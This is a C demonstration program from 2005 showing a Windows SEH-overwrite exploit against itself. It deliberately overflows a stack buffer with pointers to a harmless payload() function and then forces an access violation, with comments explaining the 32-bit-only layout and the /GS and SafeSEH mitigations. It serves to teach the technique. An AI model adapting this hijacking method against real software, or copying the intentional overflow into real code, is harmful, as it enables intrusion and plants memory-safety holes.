/*
#######################################################
## Code that will overflow itself overwriting SEH    ##
## and redirecting execution to payload() function   ##
#######################################################
  
  author: simkin
  team: badchecksum
  time frame: 21/6/2005 3:38am 
  contact: aka.simkin@gmail.com
  more: www.badchecksum.tk
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

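/*
 * Landing pad for the hijacked exception handler.  Once the overflow in
 * main() has replaced the handler pointer of the SEH record with &payload,
 * the exception dispatcher lands here.  We print a marker and exit(0) at
 * once: the stack we were reached through has been overwritten, so there
 * is nothing sensible to return to.
 *
 * Takes no arguments and never returns (exit() terminates the process and
 * flushes stdio, so the banner is not lost).  Declared with (void) instead
 * of an empty parameter list; taking its address as (long)payload in main()
 * is unaffected.
 */
void payload(void) {
	printf("<__simkin> Exploited succesfully.. :D\n");
	printf("<__simkin> Exiting.. :[\n");
	exit(0);
}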

/*
 As we haven't installed any exception handlers of our own, the first
record the dispatcher finds when it walks the chain from FS:[0] is the one
set up by the module entry point (the CRT start-up code), so the overflow
has to run past the whole of main's frame to reach it.
 Server applications usually install their own handlers much closer to the
vulnerable frame, so in a real exploitation scenario far less data (saved
frame pointer, return address, ...) has to be overwritten before the
handler pointer is reached.*/

//ModuleEntryPoint stack:
						//SEH somewhere..
						//...            
						//RET 4 bytes   
//Main stack:
/*
 * Demo entry point: smash our own stack so that the handler field of the
 * SEH record on the stack points at payload(), then raise an access
 * violation so the exception dispatcher calls it.  Deliberately relies on
 * undefined behaviour and on one specific compiler/ABI (32-bit MSVC).
 */
int main() {			//SFP 4 bytes
	char buf[24];		//24 bytes
	int i;				//4 bytes
	long *ptr;			//4 bytes

	/* View the 24-byte buffer as an array of longs so every store below
	 * fills one 4-byte stack slot.  NOTE(review): this assumes
	 * sizeof(long) == sizeof(void *), true for 32-bit Windows but not for
	 * LLP64 x64, where the (long) cast below would truncate &payload. */
	ptr = (long *)&buf;

	/*Overwrite SEH*/
	/* 24 stores x 4 bytes = 96 bytes written through a 24-byte buffer: an
	 * intentional out-of-bounds write (UB in C) used here for effect.  The
	 * run-over is meant to cover main's saved frame pointer and return
	 * address and keep going past main's frame until the handler field of
	 * the EXCEPTION_REGISTRATION record holds &payload.  How far 96 bytes
	 * actually reaches depends entirely on the compiler's frame layout.
	 * NOTE(review): a build with stack cookies (/GS) or SafeSEH handler
	 * validation would not be hijacked this way. */
	for(i = 0; i < 24; i++)
		*(ptr ++) = (long) payload;
	
	/*Raise exception*/
	/* Store through a null pointer to force an access violation.  This is
	 * MSVC x86-32 inline-asm syntax, and the FS:[0]-rooted handler chain it
	 * targets is a 32-bit mechanism, so the demo is 32-bit only. */
	__asm {
      mov eax, 0      
      mov [eax], ecx 
	  //System will look in FS:[0] for SEH and will find it
	  //overwritten by our pointer to payload()
    }

	/* Not reached in the intended flow: the fault above transfers control
	 * to payload(), which exits the process instead of returning. */
	printf("Im a useless printf since i will never get executed :(\n");
	return 0;
}
